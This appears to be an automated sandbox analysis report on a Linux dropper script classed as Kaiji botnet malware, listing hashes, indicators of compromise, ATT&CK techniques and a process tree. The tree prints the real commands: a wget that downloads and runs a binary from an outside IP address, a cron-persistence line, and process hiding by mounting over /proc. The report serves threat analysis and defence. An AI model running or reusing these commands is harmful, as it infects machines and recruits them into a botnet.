Analysis
-
max time kernel
149s -
max time network
147s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20250410-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20250410-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
16/04/2025, 18:46
Static task
static1
Behavioral task
behavioral1
Sample
download.sh
Resource
ubuntu1804-amd64-20250410-en
Behavioral task
behavioral2
Sample
download.sh
Resource
debian9-armhf-20240418-en
Behavioral task
behavioral3
Sample
download.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
download.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
download.sh
-
Size
2KB
-
MD5
544a2f391e2800bac07e883d902bcc75
-
SHA1
cea67c26c372d03b795bbba678569256385d3b83
-
SHA256
1dc484d51fb96c2097c2eb3695ff55d641e6778dbe8780cbbd0dbdfa688708ca
-
SHA512
f281a43fb6443bf15069aee5987d06d493bc0f0f47b927aea17115db168e6bf3271e5f37a0dc7f76defd21b60c24e513fcda0c2f109ce26f5bd4b802de184a4b
Malware Config
Extracted
kaiji
154.40.47.248:888
Signatures
-
Kaiji 1 IoCs
Kaiji payload
resource yara_rule behavioral1/files/fstream-1.dat Kaiji -
Kaiji family
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1531 chmod -
Executes dropped EXE 3 IoCs
ioc pid Process /tmp/linux_amd64 1532 download.sh /tmp/linux_amd64 1536 linux_amd64 /etc/32676 1542 sh -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/watchdog linux_amd64 File opened for modification /dev/misc/watchdog linux_amd64 -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
description ioc Process File opened for modification /etc/crontab sh -
Creates/modifies environment variables 1 TTPs 3 IoCs
Creating/modifying environment variables is a common persistence mechanism.
description ioc Process File opened for modification /etc/profile.d/bash_cfg linux_amd64 File opened for modification /etc/profile.d/bash_cfg.sh linux_amd64 File opened for modification /etc/profile.d/gateway.sh linux_amd64 -
Enumerates running processes
Discovers information about currently running processes on the system
-
description ioc Process File opened for modification /etc/init.d/alsa-utils linux_amd64 File opened for modification /etc/init.d/apparmor linux_amd64 File opened for modification /etc/init.d/bluetooth linux_amd64 File opened for modification /etc/init.d/cups linux_amd64 File opened for modification /etc/init.d/kmod linux_amd64 File opened for modification /etc/init.d/apport linux_amd64 File opened for modification /etc/init.d/cups-browsed linux_amd64 File opened for modification /etc/init.d/plymouth-log linux_amd64 File opened for modification /etc/init.d/selinux-autorelabel linux_amd64 File opened for modification /etc/init.d/uuidd linux_amd64 File opened for modification /etc/init.d/avahi-daemon linux_amd64 File opened for modification /etc/init.d/keyboard-setup.sh linux_amd64 File opened for modification /etc/init.d/rsync linux_amd64 File opened for modification /etc/init.d/saned linux_amd64 File opened for modification /etc/init.d/ssh linux_amd64 File opened for modification /etc/init.d/unattended-upgrades linux_amd64 File opened for modification /etc/init.d/speech-dispatcher linux_amd64 File opened for modification /etc/init.d/networking linux_amd64 File opened for modification /etc/init.d/procps linux_amd64 File opened for modification /etc/init.d/ufw linux_amd64 File opened for modification /etc/init.d/auditd linux_amd64 File opened for modification /etc/init.d/irqbalance linux_amd64 File opened for modification /etc/init.d/plymouth linux_amd64 File opened for modification /etc/init.d/x11-common linux_amd64 File opened for modification /etc/init.d/gdm3 linux_amd64 File opened for modification /etc/init.d/anacron linux_amd64 File opened for modification /etc/init.d/console-setup.sh linux_amd64 File opened for modification /etc/init.d/cron linux_amd64 File opened for modification /etc/init.d/spice-vdagent linux_amd64 File opened for modification /etc/init.d/acpid linux_amd64 File opened for modification /etc/init.d/hwclock.sh linux_amd64 File opened for modification /etc/init.d/udev linux_amd64 File opened for modification /etc/init.d/rsyslog linux_amd64 File opened for modification /etc/init.d/dbus linux_amd64 -
Write file to user bin folder 4 IoCs
description ioc Process File opened for modification /usr/bin/find linux_amd64 File opened for modification /usr/bin/lsof linux_amd64 File opened for modification /usr/bin/include/find linux_amd64 File opened for modification /usr/bin/include/lsof linux_amd64 -
Modifies Bash startup script 2 TTPs 3 IoCs
description ioc Process File opened for modification /etc/profile.d/bash_cfg linux_amd64 File opened for modification /etc/profile.d/bash_cfg.sh linux_amd64 File opened for modification /etc/profile.d/gateway.sh linux_amd64 -
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself ksoftirqd/0 1536 linux_amd64 -
Command and Scripting Interpreter: Unix Shell 1 TTPs 2 IoCs
Execute scripts via Unix Shell.
pid Process 1570 sh 1541 sh -
Enumerates kernel/hardware configuration 1 TTPs 2 IoCs
Reads contents of /sys virtual filesystem to enumerate system information.
description ioc Process File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size linux_amd64 File opened for reading /sys/kernel/mm/transparent_hugepage/hpage_pmd_size linux_amd64 -
description ioc Process File opened for reading /proc/1204/stat linux_amd64 File opened for reading /proc/1/environ systemctl File opened for reading /proc/1/sched systemctl File opened for reading /proc/sys/kernel/osrelease systemctl File opened for reading /proc/723/stat linux_amd64 File opened for reading /proc/cmdline systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/1/sched systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/1/sched systemctl File opened for reading /proc/sys/kernel/osrelease systemctl File opened for reading /proc/1/sched systemctl File opened for reading /proc/1/sched systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/910/stat linux_amd64 File opened for reading /proc/filesystems sed File opened for reading /proc/1/sched systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/1/sched systemctl File opened for reading /proc/1/sched systemctl File opened for reading /proc/460/stat linux_amd64 File opened for reading /proc/sys/kernel/osrelease systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/sys/kernel/osrelease systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/690/stat linux_amd64 File opened for reading /proc/1/sched systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/316/stat linux_amd64 File opened for reading /proc/570/stat linux_amd64 File opened for reading /proc/self/stat systemctl File opened for reading /proc/sys/kernel/osrelease systemctl File opened for reading /proc/1/sched systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/filesystems systemctl File opened for reading /proc/1/sched systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/1/environ systemctl File opened for reading /proc/1081/stat linux_amd64 File opened for reading /proc/1146/stat linux_amd64 File opened for reading /proc/filesystems systemctl File opened for reading /proc/1/sched systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/sys/kernel/osrelease systemctl File opened for reading /proc/cmdline systemctl File opened for reading /proc/1544/stat linux_amd64 File opened for reading /proc/filesystems systemctl File opened for reading /proc/self/stat systemctl File opened for reading /proc/sys/kernel/osrelease systemctl File opened for reading /proc/912/stat linux_amd64 File opened for reading /proc/1346/stat linux_amd64 File opened for reading /proc/1/environ systemctl -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/linux_amd64 wget
Processes
-
/tmp/download.sh/tmp/download.sh1⤵
- Executes dropped EXE
PID:1524 -
/bin/unameuname -s2⤵PID:1525
-
-
/bin/unameuname -m2⤵PID:1526
-
-
/usr/bin/wgetwget -t 1 http://154.40.47.248:8000/linux_amd642⤵
- Writes file to tmp directory
PID:1527
-
-
/bin/chmodchmod +x linux_amd642⤵
- File and Directory Permissions Modification
PID:1531
-
-
/tmp/linux_amd64./linux_amd642⤵
- Executes dropped EXE
- Enumerates kernel/hardware configuration
PID:1532 -
/tmp/linux_amd64./linux_amd64 " "3⤵
- Modifies Watchdog functionality
- Creates/modifies environment variables
- Modifies init.d
- Write file to user bin folder
- Modifies Bash startup script
- Changes its process name
- Enumerates kernel/hardware configuration
- Reads runtime system information
PID:1536 -
/bin/sh/bin/sh -c "/etc/32676&"4⤵
- Executes dropped EXE
- Command and Scripting Interpreter: Unix Shell
PID:1541
-
-
/usr/sbin/serviceservice crond start4⤵PID:1543
-
/usr/bin/basenamebasename /usr/sbin/service5⤵PID:1545
-
-
/usr/bin/basenamebasename /usr/sbin/service5⤵PID:1546
-
-
/bin/systemctlsystemctl --quiet is-active multi-user.target5⤵
- Reads runtime system information
PID:1547
-
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"5⤵
- Reads runtime system information
PID:1550
-
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"5⤵
- Reads runtime system information
PID:1549
-
-
/bin/systemctlsystemctl -p Triggers show acpid.socket5⤵
- Reads runtime system information
PID:1551
-
-
/bin/systemctlsystemctl -p Triggers show apport-forward.socket5⤵
- Reads runtime system information
PID:1552
-
-
/bin/systemctlsystemctl -p Triggers show avahi-daemon.socket5⤵PID:1553
-
-
/bin/systemctlsystemctl -p Triggers show cups.socket5⤵
- Reads runtime system information
PID:1554
-
-
/bin/systemctlsystemctl -p Triggers show dbus.socket5⤵PID:1555
-
-
/bin/systemctlsystemctl -p Triggers show saned.socket5⤵
- Reads runtime system information
PID:1556
-
-
/bin/systemctlsystemctl -p Triggers show snapd.socket5⤵
- Reads runtime system information
PID:1557
-
-
/bin/systemctlsystemctl -p Triggers show ssh.socket5⤵
- Reads runtime system information
PID:1558
-
-
/bin/systemctlsystemctl -p Triggers show syslog.socket5⤵
- Reads runtime system information
PID:1559
-
-
/bin/systemctlsystemctl -p Triggers show systemd-fsckd.socket5⤵
- Reads runtime system information
PID:1560
-
-
/bin/systemctlsystemctl -p Triggers show systemd-initctl.socket5⤵
- Reads runtime system information
PID:1561
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-audit.socket5⤵
- Reads runtime system information
PID:1562
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-dev-log.socket5⤵
- Reads runtime system information
PID:1563
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald.socket5⤵PID:1564
-
-
/bin/systemctlsystemctl -p Triggers show systemd-networkd.socket5⤵
- Reads runtime system information
PID:1565
-
-
/bin/systemctlsystemctl -p Triggers show systemd-rfkill.socket5⤵PID:1566
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-control.socket5⤵PID:1567
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-kernel.socket5⤵PID:1568
-
-
/bin/systemctlsystemctl -p Triggers show uuidd.socket5⤵
- Reads runtime system information
PID:1569
-
-
-
/usr/local/sbin/systemctlsystemctl start crond.service4⤵PID:1543
-
-
/usr/local/bin/systemctlsystemctl start crond.service4⤵PID:1543
-
-
/usr/sbin/systemctlsystemctl start crond.service4⤵PID:1543
-
-
/usr/bin/systemctlsystemctl start crond.service4⤵PID:1543
-
-
/sbin/systemctlsystemctl start crond.service4⤵PID:1543
-
-
/bin/systemctlsystemctl start crond.service4⤵PID:1543
-
-
/bin/sh/bin/sh -c "echo \"*/1 * * * * root /.mod \" >> /etc/crontab"4⤵
- Creates/modifies Cron job
- Command and Scripting Interpreter: Unix Shell
PID:1570
-
-
/usr/bin/renicerenice -20 15364⤵PID:1571
-
-
/bin/mountmount -o bind /tmp/ /proc/15364⤵PID:1572
-
-
/usr/sbin/serviceservice cron start4⤵PID:1574
-
/usr/bin/basenamebasename /usr/sbin/service5⤵PID:1575
-
-
/usr/bin/basenamebasename /usr/sbin/service5⤵PID:1576
-
-
/bin/systemctlsystemctl --quiet is-active multi-user.target5⤵PID:1577
-
-
/bin/sedsed -ne "s/\\.socket\\s*[a-z]*\\s*\$/.socket/p"5⤵PID:1580
-
-
/bin/systemctlsystemctl list-unit-files --full "--type=socket"5⤵
- Reads runtime system information
PID:1579
-
-
/bin/systemctlsystemctl -p Triggers show acpid.socket5⤵
- Reads runtime system information
PID:1581
-
-
/bin/systemctlsystemctl -p Triggers show apport-forward.socket5⤵PID:1582
-
-
/bin/systemctlsystemctl -p Triggers show avahi-daemon.socket5⤵
- Reads runtime system information
PID:1583
-
-
/bin/systemctlsystemctl -p Triggers show cups.socket5⤵PID:1584
-
-
/bin/systemctlsystemctl -p Triggers show dbus.socket5⤵
- Reads runtime system information
PID:1585
-
-
/bin/systemctlsystemctl -p Triggers show saned.socket5⤵
- Reads runtime system information
PID:1586
-
-
/bin/systemctlsystemctl -p Triggers show snapd.socket5⤵PID:1587
-
-
/bin/systemctlsystemctl -p Triggers show ssh.socket5⤵
- Reads runtime system information
PID:1588
-
-
/bin/systemctlsystemctl -p Triggers show syslog.socket5⤵
- Reads runtime system information
PID:1589
-
-
/bin/systemctlsystemctl -p Triggers show systemd-fsckd.socket5⤵PID:1590
-
-
/bin/systemctlsystemctl -p Triggers show systemd-initctl.socket5⤵
- Reads runtime system information
PID:1591
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-audit.socket5⤵PID:1592
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald-dev-log.socket5⤵
- Reads runtime system information
PID:1593
-
-
/bin/systemctlsystemctl -p Triggers show systemd-journald.socket5⤵
- Reads runtime system information
PID:1594
-
-
/bin/systemctlsystemctl -p Triggers show systemd-networkd.socket5⤵
- Reads runtime system information
PID:1595
-
-
/bin/systemctlsystemctl -p Triggers show systemd-rfkill.socket5⤵
- Reads runtime system information
PID:1596
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-control.socket5⤵PID:1597
-
-
/bin/systemctlsystemctl -p Triggers show systemd-udevd-kernel.socket5⤵
- Reads runtime system information
PID:1598
-
-
/bin/systemctlsystemctl -p Triggers show uuidd.socket5⤵
- Reads runtime system information
PID:1599
-
-
-
/usr/local/sbin/systemctlsystemctl start cron.service4⤵PID:1574
-
-
/usr/local/bin/systemctlsystemctl start cron.service4⤵PID:1574
-
-
/usr/sbin/systemctlsystemctl start cron.service4⤵PID:1574
-
-
/usr/bin/systemctlsystemctl start cron.service4⤵PID:1574
-
-
/sbin/systemctlsystemctl start cron.service4⤵PID:1574
-
-
/bin/systemctlsystemctl start cron.service4⤵
- Reads runtime system information
PID:1574
-
-
/bin/systemctlsystemctl start crond.service4⤵
- Reads runtime system information
PID:1600
-
-
-
-
/bin/rm/bin/rm /tmp/download.sh2⤵PID:1537
-
-
/etc/32676/etc/326761⤵PID:1542
-
/bin/sleepsleep 602⤵PID:1544
-
-
/bin/sleepsleep 602⤵PID:1616
-
-
/bin/sleepsleep 602⤵PID:1627
-
Network
MITRE ATT&CK Enterprise v16
Execution
Command and Scripting Interpreter
1Unix Shell
1Scheduled Task/Job
1Cron
1Persistence
Boot or Logon Autostart Execution
2Boot or Logon Initialization Scripts
1RC Scripts
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Scheduled Task/Job
1Cron
1Privilege Escalation
Boot or Logon Autostart Execution
2Boot or Logon Initialization Scripts
1RC Scripts
1Event Triggered Execution
1Unix Shell Configuration Modification
1Hijack Execution Flow
1Path Interception by PATH Environment Variable
1Scheduled Task/Job
1Cron
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
34B
MD5f5a3713282e43c200f30342f5ff5e2ea
SHA12b2ce1a207e2b691a074c6f78f71c4785aae426a
SHA2566ab64e727571458d4884fb2fe82c27c467db0699cb8f648b3f0217c35d2b7511
SHA5125bcb8cd360409147a486755f90e0cdd97183af02ce8de5135b7c6a8a010deb9ef12dcd5ee9a2a8fd2e159347f68e72d6b7fd75e943b4fcd928d7a74b97476013
-
Filesize
49B
MD57b6092eb341d814a12c0772fcbd2e4c5
SHA1af07165fcaecae523111049ad61a67eff08183ec
SHA25607520ca9930e4658a481259f546f4ec55912d7968b019441fc18309d23c29f97
SHA5120365451fae150c11bda418fea8c993e8ca6528b0818a78e1c4b91757e5fb458499cc2d4ac7dacb4725082686d2d6c88cb46f2676f4961e757fa57d36464d91a6
-
Filesize
98B
MD59835effe62d8a1b41f6a6cd8057fd113
SHA171145150b1d03bfb36f277f7604c539442c30c05
SHA256a3834cd0bd816bc3b28e9d2cc3dca12af6d717c3a94ee35d4ef5e0e4d6e635a0
SHA5126b6e99977dff5c41e96e2c54e2326a562ff762fae54a472205aad3bf069bb6b3c0a1948840e65e9260c44794e1f19f47eceb6c44cc9a09f61f19dbe73930b47f
-
Filesize
56B
MD5585f408444cbca746945f0cb63f2c3f0
SHA10e44bae17174f04514e770ca7fc4bec1007e39cd
SHA256ebb961c647363dfa90f302de378e0e61807b9b792fc86616635a713cca8f4299
SHA512022241dbafad55164701f67ef5b84154e3af97c5dfe77dee7bf8406f2befbd2962bbf4f243432b2f41d6c2376b87fcf551fd6945e03ddb02a5619c2f0f69c596
-
Filesize
1KB
MD5fd68e894a07448b5229049cfad5ca5c8
SHA185f443429161fa1c111d69b308fd6d744cdef85c
SHA2567d5fd87e6a3a6a9fe3783eeef0dd9fae0d412abbd625daed9dc06f6d7438e384
SHA512d5f6213e3c361563f3ad318e3454c80e47ef19bcdbd8fa1875a3e83179e2091c2bd913c623322bc19c5064dfd09c8c2919cf68fcbd898d62e7d872cc7b6b17e3
-
Filesize
1.9MB
MD54a67fbaac9ab2555654663e56ad125a1
SHA1d6dbe82c06c8bd5b83eea3daa26605b10c4e4457
SHA256c09b6758cad544622f1a8a0e5edb64af4b952eb95ae94dcfe20fc1af2a9ab7e4
SHA5127a88709312bfdf50b3900abeab5e916fcbb63e773b58e158b557f239d1e8b861c4294dd86cfec80e4baf199fcb606d484da991c7b42594ec8999f945a4afb154
-
Filesize
232KB
MD5f11b2b59639b1edcb46026472786c747
SHA1a6fe59e11456bc7f19e28b38aa9c1f9c1a13b70d
SHA256189fbf2416c8205430d8eaa85e2947bc15504ca335ad4a77ec668ff3cbf9c84a
SHA5121967f43b4b274e2afbc30e8e1bad314085e488066b22233e6ec033dbae10ae111320296b9d429e94cb3079636a37e433aeac928b4ef23a56dedae1741815416b
-
Filesize
159KB
MD5e093dc78225e2a0a25e3b137c1c1e442
SHA1c29497cfaae729eb576875e4fdfa400640ab16be
SHA2561190f4dbc7be174de8fd4096c9bf7a28eebfac937d308b7cc533be4a1240d26e
SHA512fe1cc7a65327732eaaee89f427c10239ba822430e34177842f4681068d78d404b1830d808a2a71b1efcc5f126c6d8c053512237421173aaa150e215a672da6f0